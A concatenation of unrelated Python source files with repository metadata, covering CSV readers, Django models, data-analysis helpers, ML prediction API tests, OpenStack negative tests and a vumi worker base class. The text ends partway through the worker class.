csv_readers/stay_points_csv_reader.py
|
s0lver/stm-creator
|
b058185ca028abd1902edbb35a52d3565b06f8b0
|
[
"Apache-2.0"
] | null | null | null |
import csv
from typing import List, Iterator, Dict
from entities.StayPoint import StayPoint
def read(file_path: str) -> List[StayPoint]:
"""
Returns a list of StayPoint read from the specified file path
:param file_path: The path of file to read
:return: A list of StayPoint
"""
file = open(file_path, 'r', newline='', encoding='utf-8')
results = []
reader = csv.DictReader(file, delimiter=',')
for line in reader:
stay_point = build_stay_point_from_line(line)
results.append(stay_point)
return results
def read_line_by_line(file_path: str) -> Iterator[StayPoint]:
"""
Reads a csv file of stay points line by line
:param file_path: The path of file to read
    :return: An iterator that yields one StayPoint per line
"""
file = open(file_path, 'r', newline='', encoding='utf-8')
reader = csv.DictReader(file, delimiter=',')
for line in reader:
current_stay_point = build_stay_point_from_line(line)
yield current_stay_point
def build_stay_point_from_line(line: Dict) -> StayPoint:
"""
Builds a StayPoint object parsing the specified line
:param line: The line to parse
:return: A StayPoint object
"""
id_stay_point = int(line["_id"])
latitude = float(line["latitude"])
longitude = float(line["longitude"])
visit_count = int(line["visitCount"])
stay_point = StayPoint(id_stay_point, latitude, longitude, visit_count)
return stay_point
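# Usage sketch (the CSV path is a placeholder; the file is expected to have
# the columns _id, latitude, longitude and visitCount):
#
#   for stay_point in read_line_by_line("stay_points.csv"):
#       print(stay_point)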
| 29.66
| 75
| 0.681052
| 0
| 0
| 459
| 0.309508
| 0
| 0
| 0
| 0
| 523
| 0.352664
|
3bc47ccda883fce926fb879e2f171e425ac7191d
| 1,959
|
py
|
Python
|
login/models.py
|
zcw576020095/netsysyconfig_platform
|
d47be2c5b3418d59a226cb9e135972160e51df00
|
[
"Unlicense"
] | 1
|
2022-03-25T07:49:10.000Z
|
2022-03-25T07:49:10.000Z
|
login/models.py
|
zcw576020095/netsysyconfig_platform
|
d47be2c5b3418d59a226cb9e135972160e51df00
|
[
"Unlicense"
] | null | null | null |
login/models.py
|
zcw576020095/netsysyconfig_platform
|
d47be2c5b3418d59a226cb9e135972160e51df00
|
[
"Unlicense"
] | null | null | null |
from django.db import models
# Create your models here.
class User(models.Model):
gender = (
('male',"男"),
('female',"女")
)
name = models.CharField(max_length=128,unique=True)
password = models.CharField(max_length=256)
email = models.EmailField(unique=True)
sex = models.CharField(max_length=32, choices=gender,default="男")
create_time = models.DateTimeField(auto_now_add=True)
has_confirmed = models.BooleanField(default=False)
def __str__(self):
return self.name
class Meta:
ordering = ["-create_time"]
verbose_name = "用户"
verbose_name_plural = "用户"
class ConfirmString(models.Model):
code = models.CharField(max_length=256)
user = models.OneToOneField('User',on_delete=models.CASCADE)
create_time = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.user.name + ": " + self.code
class Meta:
ordering = ["-create_time"]
verbose_name = "确认码"
verbose_name_plural = "确认码"
## Network disconnection records
class ClickHistory(models.Model):
clicknet_areaname = models.CharField(max_length=128,verbose_name='断网区域')
clicknet_date = models.DateTimeField(max_length=64,verbose_name="断网时间")
def __str__(self):
return '{} {}'.format(self.clicknet_areaname,self.clicknet_date)
class Meta:
db_table = 'click_history'
ordering = ["-clicknet_date"]
verbose_name = "断网记录"
verbose_name_plural = "断网记录"
## Network connection records
class ConnectHistory(models.Model):
connectnet_areaname = models.CharField(max_length=128,verbose_name='联网区域')
connectnet_date = models.DateTimeField(max_length=64,verbose_name="联网时间")
def __str__(self):
return '{} {}'.format(self.connectnet_areaname,self.connectnet_date)
class Meta:
db_table = 'connect_history'
ordering = ["-connectnet_date"]
verbose_name = "联网记录"
verbose_name_plural = "联网记录"
| 27.591549
| 78
| 0.669219
| 1,966
| 0.952058
| 0
| 0
| 0
| 0
| 0
| 0
| 353
| 0.170944
|
3bc52fc59dc21473a03e193fd04c98996f1d2a1e
| 2,083
|
py
|
Python
|
DataAnalysis.py
|
andairka/Simple-default-Backpropagation-ANN
|
995de1471e2b132af721b2babbec034f29228640
|
[
"MIT"
] | null | null | null |
DataAnalysis.py
|
andairka/Simple-default-Backpropagation-ANN
|
995de1471e2b132af721b2babbec034f29228640
|
[
"MIT"
] | null | null | null |
DataAnalysis.py
|
andairka/Simple-default-Backpropagation-ANN
|
995de1471e2b132af721b2babbec034f29228640
|
[
"MIT"
] | null | null | null |
import ImportTitanicData
import DataPreparation
# data analysis before data preparation
class DataAnaliysisBefore():
def showTrain(self):
importData = ImportTitanicData.DataImport()
train = importData.importTrain()
return train
def shapeTrain(self):
return self.showTrain().shape
def dtypesTrain(self):
return self.showTrain().dtypes
def showTest(self):
importData = ImportTitanicData.DataImport()
test = importData.importTest()
return test
def shapeTest(self):
return self.showTest().shape
def dtypesTest(self):
return self.showTest().dtypes
# data analysis after data preparation
class DataAnaliysisAfter():
def showTrain(self):
dataPreparation = DataPreparation.DataPreparation()
train = dataPreparation.prepareTrainData()
return train
def shapeTrain(self):
return self.showTrain().shape
def dtypesTrain(self):
return self.showTrain().dtypes
def showTest(self):
dataPreparation = DataPreparation.DataPreparation()
test = dataPreparation.prepareTestData()
return test
def shapeTest(self):
return self.showTest().shape
def dtypesTest(self):
return self.showTest().dtypes
#
#
# def showTest(self):
# test = ImportTitanicData.DataImport.importTest()
# return test.head()
# def showTest ()
# dataAnaysis = DataAnaliysisBefore()
dataAnaysis = DataAnaliysisAfter()
# print('czesio')
# print('Data analysis before filling NaN')
# print('Train table\n', dataAnaysis.showTrain())
# print('\n\nshape Train\n', dataAnaysis.shapeTrain())
# print('\n\ndtypes Train\n', dataAnaysis.dtypesTrain())
print('Data analysis after filling NaN and data preparation')
print('Train table\n', dataAnaysis.showTrain())
print('\n\nshape Train\n', dataAnaysis.shapeTrain())
print('\n\ndtypes Train\n', dataAnaysis.dtypesTrain())
# dataPreparation = DataPreparation.DataPreparation()
# print(dataPreparation.prepareTrainData().to_string())
| 26.367089
| 63
| 0.68987
| 1,311
| 0.628476
| 0
| 0
| 0
| 0
| 0
| 0
| 679
| 0.325503
|
3bc5e3ab47f6373dad23233f3b3391f39ba91b96
| 10,341
|
py
|
Python
|
tests/api/test_predict.py
|
mldock/mldock
|
314b733e4f0102321727f8b145fc276486ecad85
|
[
"Apache-2.0"
] | 2
|
2021-07-12T13:51:21.000Z
|
2021-07-19T08:40:02.000Z
|
tests/api/test_predict.py
|
mldock/mldock
|
314b733e4f0102321727f8b145fc276486ecad85
|
[
"Apache-2.0"
] | 41
|
2021-06-28T11:05:20.000Z
|
2022-03-13T13:48:50.000Z
|
tests/api/test_predict.py
|
mldock/mldock
|
314b733e4f0102321727f8b145fc276486ecad85
|
[
"Apache-2.0"
] | 1
|
2021-07-17T19:07:06.000Z
|
2021-07-17T19:07:06.000Z
|
"""Test Predict API calls"""
import io
from PIL import Image
from dataclasses import dataclass
import tempfile
from pathlib import Path
import pytest
from mock import patch
from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction
import responses
import requests
@pytest.fixture
def image_bytes():
"""reads image as bytes string"""
img = Image.open("tests/api/fixtures/eight.png", mode="r")
img_byte_arr = io.BytesIO()
img.save(img_byte_arr, format="PNG")
return img_byte_arr.getvalue()
@dataclass
class MockResponse:
status_code: int
json_data: dict = None
text: str = None
_content: bytes = None
def json(self):
return self.json_data
class TestPredictAPI:
"""
    TEST ERROR STATUS_CODE!=200 SCENARIO
"""
@staticmethod
@responses.activate
def test_handle_prediction_send_json_handles_non_200():
responses.add(
responses.POST,
"http://nothing-to-see-here/invocations",
json={"error": "client error"},
status=404,
)
with pytest.raises(requests.exceptions.RequestException):
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.json",
response_file=None,
request_content_type="application/json",
response_content_type="application/json",
)
@staticmethod
@responses.activate
def test_handle_prediction_sending_image_jpeg_handles_non_200():
responses.add(
responses.POST,
"http://nothing-to-see-here/invocations",
json={"error": "client error"},
status=404,
)
with pytest.raises(requests.exceptions.RequestException):
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/eight.png",
response_file=None,
request_content_type="image/jpeg",
response_content_type="application/json",
)
@staticmethod
@responses.activate
def test_handle_prediction_sending_text_csv_handles_non_200():
responses.add(
responses.POST,
"http://nothing-to-see-here/invocations",
json={"error": "client error"},
status=404,
)
with pytest.raises(requests.exceptions.RequestException):
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.csv",
response_file=None,
request_content_type="text/csv",
response_content_type="application/json",
)
"""
    TEST SUCCESS STATUS_CODE=200 SCENARIO
"""
@staticmethod
def test_handle_prediction_send_json_success_200():
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
json_data={"result": "success"}, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.json",
response_file=None,
request_content_type="application/json",
response_content_type="application/json",
)
validation_kwargs = {
"url": "http://nothing-to-see-here/invocations",
"headers": {"Content-Type": "application/json"},
}
_, kwargs = list(mock_execute_request.call_args)
data_obj = kwargs.pop("data")
assert (
kwargs == validation_kwargs
), "Failure. URL and Headers are incorrect."
assert isinstance(data_obj, str), "Failure. Expected str json object."
@staticmethod
def test_handle_prediction_sending_image_jpeg_success_200(image_bytes):
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
_content=image_bytes, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/eight.png",
response_file=None,
request_content_type="image/jpeg",
response_content_type="image/jpeg",
)
validation_kwargs = {
"url": "http://nothing-to-see-here/invocations",
"headers": {"Content-Type": "image/jpeg"},
}
_, kwargs = list(mock_execute_request.call_args)
data_obj = kwargs.pop("data")
assert (
kwargs == validation_kwargs
), "Failure. URL and Headers are incorrect."
assert isinstance(
data_obj, io.BytesIO
), "Failure. Expected io.BytesIO object."
@staticmethod
def test_handle_prediction_sending_text_csv_success_200():
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
text="greet,name\nhello,sam", status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.csv",
response_file=None,
request_content_type="text/csv",
response_content_type="text/csv",
)
validation_kwargs = {
"url": "http://nothing-to-see-here/invocations",
"headers": {"Content-Type": "text/csv"},
}
_, kwargs = list(mock_execute_request.call_args)
data_obj = kwargs.pop("data")
assert (
kwargs == validation_kwargs
), "Failure. URL and Headers are incorrect."
assert isinstance(data_obj, str), "Failure. Expected str json object."
"""
    TEST WRITING RESPONSE TO FILE SCENARIO
"""
@staticmethod
def test_handle_prediction_send_json_success_write_response_file():
with tempfile.TemporaryDirectory() as tmp_dir:
response_filepath = Path(tmp_dir, "response.json")
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
json_data={"result": "success"}, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.json",
response_file=response_filepath,
request_content_type="application/json",
response_content_type="application/json",
)
assert (
response_filepath.is_file()
), "Failure. outputfile was not created"
@staticmethod
def test_handle_prediction_sending_image_jpeg_success_write_response_file(
image_bytes,
):
with tempfile.TemporaryDirectory() as tmp_dir:
response_filepath = Path(tmp_dir, "response.png")
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
_content=image_bytes, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/eight.png",
response_file=response_filepath,
request_content_type="image/jpeg",
response_content_type="image/jpeg",
)
assert (
response_filepath.is_file()
), "Failure. outputfile was not created"
@staticmethod
def test_handle_prediction_sending_text_csv_success_write_response_file():
with tempfile.TemporaryDirectory() as tmp_dir:
response_filepath = Path(tmp_dir, "response.csv")
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
text="greet,name\nhello,sam", status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.csv",
response_file=response_filepath,
request_content_type="text/csv",
response_content_type="text/csv",
)
assert (
response_filepath.is_file()
), "Failure. outputfile was not created"
"""
    TEST ADDING ADDITIONAL HEADERS
"""
@staticmethod
def test_handle_prediction_send_json_success_add_headers():
with patch("mldock.api.predict.execute_request") as mock_execute_request:
mock_execute_request.return_value = MockResponse(
json_data={"result": "success"}, status_code=200
)
_ = handle_prediction(
host="http://nothing-to-see-here/invocations",
request="tests/api/fixtures/payload.json",
response_file=None,
request_content_type="application/json",
response_content_type="application/json",
headers={"Authentication": "bearer 12345"},
)
validation_kwargs = {
"url": "http://nothing-to-see-here/invocations",
"headers": {
"Content-Type": "application/json",
"Authentication": "bearer 12345",
},
}
_, kwargs = list(mock_execute_request.call_args)
kwargs.pop("data")
assert (
kwargs == validation_kwargs
), "Failure. URL and Headers are incorrect."
| 35.782007
| 86
| 0.579634
| 9,784
| 0.946137
| 0
| 0
| 9,718
| 0.939754
| 0
| 0
| 2,697
| 0.260806
|
3bc608810561bbe247f5ed3cfef52e4be93e7faa
| 2,081
|
py
|
Python
|
neutron/tests/tempest/api/test_qos_negative.py
|
mail2nsrajesh/neutron
|
352afb37afcf4952f03436b25618d0066c51f3f1
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/tempest/api/test_qos_negative.py
|
mail2nsrajesh/neutron
|
352afb37afcf4952f03436b25618d0066c51f3f1
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/tempest/api/test_qos_negative.py
|
mail2nsrajesh/neutron
|
352afb37afcf4952f03436b25618d0066c51f3f1
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.db import constants as db_const
from tempest.lib import decorators
from tempest.lib import exceptions as lib_exc
from tempest import test
from neutron.tests.tempest.api import base
LONG_NAME_NG = 'z' * (db_const.NAME_FIELD_SIZE + 1)
LONG_DESCRIPTION_NG = 'z' * (db_const.LONG_DESCRIPTION_FIELD_SIZE + 1)
LONG_TENANT_ID_NG = 'z' * (db_const.PROJECT_ID_FIELD_SIZE + 1)
class QosNegativeTestJSON(base.BaseAdminNetworkTest):
required_extensions = ['qos']
@test.attr(type='negative')
@decorators.idempotent_id('b9dce555-d3b3-11e5-950a-54ee757c77da')
def test_add_policy_with_too_long_name(self):
self.assertRaises(lib_exc.BadRequest,
self.client.create_qos_policy,
LONG_NAME_NG, 'test policy desc1', False)
@test.attr(type='negative')
@decorators.idempotent_id('b9dce444-d3b3-11e5-950a-54ee747c99db')
def test_add_policy_with_too_long_description(self):
self.assertRaises(lib_exc.BadRequest,
self.client.create_qos_policy,
'test-policy', LONG_DESCRIPTION_NG, False)
@test.attr(type='negative')
@decorators.idempotent_id('b9dce444-d3b3-11e5-950a-54ee757c77dc')
def test_add_policy_with_too_long_tenant_id(self):
self.assertRaises(lib_exc.BadRequest,
self.client.create_qos_policy,
'test-policy', 'test policy desc1',
False, LONG_TENANT_ID_NG)
| 41.62
| 78
| 0.695819
| 1,119
| 0.537722
| 0
| 0
| 1,013
| 0.486785
| 0
| 0
| 783
| 0.376261
|
3bc6222a69419d7c3721ce7c39a656221c86ab89
| 1,105
|
py
|
Python
|
src/main/python/storytext/lib/storytext/javageftoolkit/__init__.py
|
emilybache/texttest-runner
|
2d5c42b8d37699a2cbcb8f19af7c271d6ad1024a
|
[
"MIT"
] | null | null | null |
src/main/python/storytext/lib/storytext/javageftoolkit/__init__.py
|
emilybache/texttest-runner
|
2d5c42b8d37699a2cbcb8f19af7c271d6ad1024a
|
[
"MIT"
] | null | null | null |
src/main/python/storytext/lib/storytext/javageftoolkit/__init__.py
|
emilybache/texttest-runner
|
2d5c42b8d37699a2cbcb8f19af7c271d6ad1024a
|
[
"MIT"
] | null | null | null |
""" Don't load any Eclipse stuff at global scope, needs to be importable previous to Eclipse starting """
from storytext import javarcptoolkit
import sys
class ScriptEngine(javarcptoolkit.ScriptEngine):
def createReplayer(self, universalLogging=False, **kw):
return UseCaseReplayer(self.uiMap, universalLogging, self.recorder, **kw)
def getDefaultTestscriptPluginName(self):
return "org.eclipse.swtbot.gef.testscript"
class UseCaseReplayer(javarcptoolkit.UseCaseReplayer):
def getDescriberPackage(self):
return javarcptoolkit.UseCaseReplayer.__module__
def getTestRunnerClass(self):
return TestRunner
class TestRunner(javarcptoolkit.TestRunner):
def initEclipsePackages(self):
javarcptoolkit.TestRunner.initEclipsePackages(self)
from org.eclipse.swtbot.eclipse.gef.finder import SWTGefBot
from org.eclipse.swtbot.eclipse.gef.finder.widgets import SWTBotGefViewer
from org.eclipse.draw2d import FigureCanvas
from org.eclipse.draw2d.geometry import Rectangle
from org.eclipse.gef import EditPart
| 38.103448
| 105
| 0.761086
| 943
| 0.853394
| 0
| 0
| 0
| 0
| 0
| 0
| 140
| 0.126697
|
3bc648d7577a48d53c343d95dc1ac69b209de7c4
| 11,380
|
py
|
Python
|
subscribe/models.py
|
jonge-democraten/dyonisos
|
bebc5b28761bd5e036e4e6e219b5474d901026c3
|
[
"MIT"
] | null | null | null |
subscribe/models.py
|
jonge-democraten/dyonisos
|
bebc5b28761bd5e036e4e6e219b5474d901026c3
|
[
"MIT"
] | 10
|
2016-10-31T21:14:06.000Z
|
2021-01-07T22:34:42.000Z
|
subscribe/models.py
|
jonge-democraten/dyonisos
|
bebc5b28761bd5e036e4e6e219b5474d901026c3
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2011,2014 Floor Terra <floort@gmail.com>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import datetime
import logging
import traceback
from django.core.mail import EmailMessage
from django.db import models
from django.template import Context, Template
logger = logging.getLogger(__name__)
AFDELINGEN = (
("AMS", "Amsterdam"),
("AN", "Arnhem-Nijmegen"),
("BB", "Brabant"),
("FR", "Friesland"),
("GR", "Groningen"),
("LH", "Leiden-Haaglanden"),
("MS", "Limburg"),
("RD", "Rotterdam"),
("TW", "Overijssel"),
("UT", "Utrecht"),
("WN", "Wageningen"),
("INT", "Internationaal"),
)
def afdeling_text(afd):
for key, value in AFDELINGEN:
if key == afd:
return value
return None
QUESTION_TYPES = (
("INT", "Integer"),
("TXT", "Text Input"),
("AFD", "Afdeling"),
("BOOL", "Ja/Nee"),
("CHOICE", "Multiple Choice"),
("TEXT", "HTML Text"),
)
class Event(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField()
start_registration = models.DateTimeField()
end_registration = models.DateTimeField()
description = models.TextField()
contact_email = models.EmailField()
email_template = models.TextField(help_text="Enkele placeholders: {{voornaam}}, {{achternaam}}, {{inschrijf_opties}}")
price = models.IntegerField(help_text="Eurocenten", default=0)
max_registrations = models.IntegerField(default=0, help_text="Als groter dan 0, bepaalt maximaal aantal inschrijvingen")
class Meta:
ordering = ('-end_registration',)
def __str__(self):
return self.name
def subscribed(self):
return len(Registration.objects.filter(event=self))
def paid(self):
return len(Registration.objects.filter(event=self).filter(paid=True))
def total_paid(self):
return "\u20AC %.2f" % (sum([e.price for e in self.registrations.filter(paid=True)]) / 100.)
def form_link(self):
return "<a href=\"https://events.jongedemocraten.nl/inschrijven/%s/\">Inschrijven</a>" % (self.slug)
form_link.allow_tags = True
def all_free(self):
"""Are all event options free?"""
if self.price != 0:
return False
if len(EventOption.objects.filter(price__gt=0).filter(question__event=self)):
return False
return True
def active(self):
now = datetime.datetime.now()
if self.start_registration > now or self.end_registration < now:
return False
return True
# active.boolean = True
def price_str(self):
return "\u20AC %.2f" % (float(self.price) / 100)
def is_full(self):
if self.max_registrations <= 0:
return False
return self.registrations.count() >= self.max_registrations
is_full.boolean = True
def get_registrations_over_limit(self):
results = []
if self.max_registrations > 0:
results += self.registrations.order_by('pk')[int(self.max_registrations):]
for question in self.eventquestion_set.all():
for option in question.options.all():
results += option.get_registrations_over_limit()
return results
class EventQuestion(models.Model):
event = models.ForeignKey(Event)
name = models.CharField(max_length=64)
question_type = models.CharField(max_length=16, choices=QUESTION_TYPES)
required = models.BooleanField(default=False, help_text='Bij Ja/Nee: verplicht aanvinken; bij andere: verplicht invullen')
radio = models.BooleanField(default=False, help_text='Voor multiple-choice/afdeling: geen dropdown maar radio buttons')
order = models.IntegerField(default=0, help_text='Bepaalt volgorde op formulier; gebruik order<0 voor elementen vooraf aan voornaam, achternaam en email')
text = models.TextField(blank=True, default='', help_text='Voor "HTML Text"; geldige HTML tags: a, b/strong, code, em/i, h3, img, ul, ol, li, p, br; Geldige HTML attributen: class, style, a.href, a.target, img.src, img.alt')
def __str__(self):
return "%s (%s)" % (self.name, self.question_type)
def form_id(self):
return "q%d" % (self.id)
def delete_event_question(self):
return '<a href="/deleteEventQuestion/?optionId=%d">Delete</a>' % (self.id)
delete_event_question.allow_tags = True
class EventOption(models.Model):
question = models.ForeignKey('EventQuestion', related_name="options")
name = models.CharField(max_length=200)
price = models.IntegerField(help_text="Eurocenten", default=0)
active = models.BooleanField(default=True)
order = models.IntegerField(default=0)
limit = models.IntegerField(default=0, help_text="Aantal beschikbare plekken (0 = geen limiet)")
def __str__(self):
if self.price < 0:
return "%s: \u20AC %.2f korting" % (self.name, float(-self.price) / 100)
if self.price > 0:
return "%s: \u20AC %.2f" % (self.name, float(self.price) / 100)
else:
return "%s" % (self.name,)
def price_str(self):
return "\u20AC %.2f" % (float(self.price) / 100)
def delete_event_option(self):
return '<a href="/deleteEventOption/?optionId=%d">Delete</a>' % (self.id)
delete_event_option.allow_tags = True
def get_related_registrations(self):
return Registration.objects.filter(answers__option=self).order_by('pk')
def num_registrations(self):
registrations = self.get_related_registrations()
return registrations.count()
def is_full(self):
if self.limit <= 0:
return False
return self.num_registrations() >= self.limit
is_full.boolean = True
def limit_str(self):
if self.limit <= 0:
return "-"
return "{}/{}".format(self.num_registrations(), self.limit)
limit_str.short_description = "Limit usage"
def get_registrations_over_limit(self):
if self.limit <= 0:
return []
registrations = self.get_related_registrations()
return registrations[int(self.limit):]
def limit_reached(self):
return self.is_full()
limit_reached.boolean = True
class Registration(models.Model):
registration_date = models.DateTimeField(auto_now_add=True)
first_name = models.CharField(max_length=64)
last_name = models.CharField(max_length=64)
email = models.EmailField(blank=True)
event = models.ForeignKey(Event, related_name='registrations')
price = models.IntegerField(default=0)
paid = models.BooleanField(default=False)
status = models.CharField(max_length=64, default="", blank=True)
trxid = models.CharField(max_length=128, default="", blank=True)
def calculate_price(self):
self.price = self.event.price + sum([answer.option.price for answer in self.answers.exclude(option=None)])
def get_options_text(self):
results = []
added_default_fields = False
answers = {a.question: a.get_answer() for a in self.answers.all()}
for question in self.event.eventquestion_set.order_by('order'):
if question.order >= 0 and not added_default_fields:
results += ["Voornaam: {}".format(self.first_name)]
results += ["Achternaam: {}".format(self.last_name)]
results += ["Email: {}".format(self.email)]
added_default_fields = True
if question in answers:
results += ["{}: {}".format(question.name, answers[question])]
if not added_default_fields:
results += ["Voornaam: {}".format(self.first_name)]
results += ["Achternaam: {}".format(self.last_name)]
results += ["Email: {}".format(self.email)]
return '\n'.join(results)
def __str__(self):
return "%s %s - %s - %s" % (self.first_name, self.last_name, self.event, str(self.price))
def gen_subscription_id(self):
num_id = str(self.id)
safe = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")
return num_id + "x" + filter(lambda c: c in safe, self.get_options_name())[:15 - len(num_id)]
def send_confirmation_email(self):
t = Template(self.event.email_template)
c = Context({
"voornaam": self.first_name,
"achternaam": self.last_name,
"inschrijf_opties": self.get_options_text(),
})
rendered_mail = t.render(c)
email = EmailMessage(
subject="Inschrijfbevestiging: %s" % (self.event.name),
body=rendered_mail,
from_email=self.event.contact_email,
to=[self.email],
)
try:
email.send()
except:
logger.error("Could not send welcome mail to %s" % (self.email))
logger.error(traceback.format_exc())
raise
return rendered_mail
class Answer(models.Model):
# This should maybe be a "through" model
registration = models.ForeignKey(Registration, related_name='answers')
question = models.ForeignKey(EventQuestion)
int_field = models.IntegerField(default=0, null=True)
txt_field = models.CharField(max_length=256, blank=True)
bool_field = models.BooleanField(default=False)
option = models.ForeignKey(EventOption, default=None, null=True, blank=True)
def __str__(self):
return "%s - %s" % (self.question, self.get_answer())
def set_answer(self, ans):
if self.question.question_type == "INT":
self.int_field = ans
elif self.question.question_type == "TXT":
self.txt_field = ans
elif self.question.question_type == "AFD":
self.txt_field = ans
elif self.question.question_type == "BOOL":
self.bool_field = ans
if self.bool_field and len(self.question.options.all()):
self.option = self.question.options.all()[0]
else:
self.option = None
elif self.question.question_type == "CHOICE":
self.option = ans
def get_answer(self):
if self.question.question_type == "INT":
return self.int_field
elif self.question.question_type == "TXT":
return self.txt_field
elif self.question.question_type == "AFD":
return afdeling_text(self.txt_field)
elif self.question.question_type == "BOOL":
if self.option is not None:
return self.option
else:
return self.bool_field and 'Ja' or 'Nee'
elif self.question.question_type == "CHOICE":
return self.option
| 37.682119
| 228
| 0.644991
| 9,714
| 0.853603
| 0
| 0
| 0
| 0
| 0
| 0
| 2,536
| 0.222847
|
3bc7d40a1ff3f95ca6bbd675bada6d5806be3718
| 7,661
|
py
|
Python
|
vumi/worker.py
|
hnec-vr/vumi
|
b9c1100176a46774b502d5a0db225930a2d298c7
|
[
"BSD-3-Clause"
] | 1
|
2016-07-27T17:13:32.000Z
|
2016-07-27T17:13:32.000Z
|
vumi/worker.py
|
TouK/vumi
|
6d250c7039fa1d82b01c5b68722aa8a6a94580b2
|
[
"BSD-3-Clause"
] | null | null | null |
vumi/worker.py
|
TouK/vumi
|
6d250c7039fa1d82b01c5b68722aa8a6a94580b2
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- test-case-name: vumi.tests.test_worker -*-
"""Basic tools for workers that handle TransportMessages."""
import time
import os
import socket
from twisted.internet.defer import (
inlineCallbacks, succeed, maybeDeferred, gatherResults)
from twisted.python import log
from vumi.service import Worker
from vumi.middleware import setup_middlewares_from_config
from vumi.connectors import ReceiveInboundConnector, ReceiveOutboundConnector
from vumi.config import Config, ConfigInt
from vumi.errors import DuplicateConnectorError
from vumi.utils import generate_worker_id
from vumi.blinkenlights.heartbeat import (HeartBeatPublisher,
HeartBeatMessage)
def then_call(d, func, *args, **kw):
return d.addCallback(lambda r: func(*args, **kw))
class BaseConfig(Config):
"""Base config definition for workers.
You should subclass this and add worker-specific fields.
"""
amqp_prefetch_count = ConfigInt(
"The number of messages fetched concurrently from each AMQP queue"
" by each worker instance.",
default=20, static=True)
class BaseWorker(Worker):
"""Base class for a message processing worker.
This contains common functionality used by application, transport and
dispatcher workers. It should be subclassed by workers that need to
manage their own connectors.
"""
CONFIG_CLASS = BaseConfig
def __init__(self, options, config=None):
super(BaseWorker, self).__init__(options, config=config)
self.connectors = {}
self.middlewares = []
self._static_config = self.CONFIG_CLASS(self.config, static=True)
self._hb_pub = None
self._worker_id = None
def startWorker(self):
log.msg('Starting a %s worker with config: %s'
% (self.__class__.__name__, self.config))
d = maybeDeferred(self._validate_config)
then_call(d, self.setup_heartbeat)
then_call(d, self.setup_middleware)
then_call(d, self.setup_connectors)
then_call(d, self.setup_worker)
return d
def stopWorker(self):
log.msg('Stopping a %s worker.' % (self.__class__.__name__,))
d = succeed(None)
then_call(d, self.teardown_worker)
then_call(d, self.teardown_connectors)
then_call(d, self.teardown_middleware)
then_call(d, self.teardown_heartbeat)
return d
def setup_connectors(self):
raise NotImplementedError()
@inlineCallbacks
def setup_heartbeat(self):
# Disable heartbeats if worker_name is not set. We're
# currently using it as the primary identifier for a worker
if 'worker_name' in self.config:
self._worker_name = self.config.get("worker_name")
self._system_id = self.options.get("system-id", "global")
self._worker_id = generate_worker_id(self._system_id,
self._worker_name)
log.msg("Starting HeartBeat publisher with worker_name=%s"
% self._worker_name)
self._hb_pub = yield self.start_publisher(HeartBeatPublisher,
self._gen_heartbeat_attrs)
else:
log.msg("HeartBeat publisher disabled. No worker_id "
"field found in config.")
def teardown_heartbeat(self):
if self._hb_pub is not None:
self._hb_pub.stop()
self._hb_pub = None
def _gen_heartbeat_attrs(self):
# worker_name is guaranteed to be set here, otherwise this func would
# not have been called
attrs = {
'version': HeartBeatMessage.VERSION_20130319,
'worker_id': self._worker_id,
'system_id': self._system_id,
'worker_name': self._worker_name,
'hostname': socket.gethostname(),
'timestamp': time.time(),
'pid': os.getpid(),
}
attrs.update(self.custom_heartbeat_attrs())
return attrs
def custom_heartbeat_attrs(self):
"""Worker subclasses can override this to add custom attributes"""
return {}
def teardown_connectors(self):
d = succeed(None)
for connector_name in self.connectors.keys():
then_call(d, self.teardown_connector, connector_name)
return d
def setup_worker(self):
raise NotImplementedError()
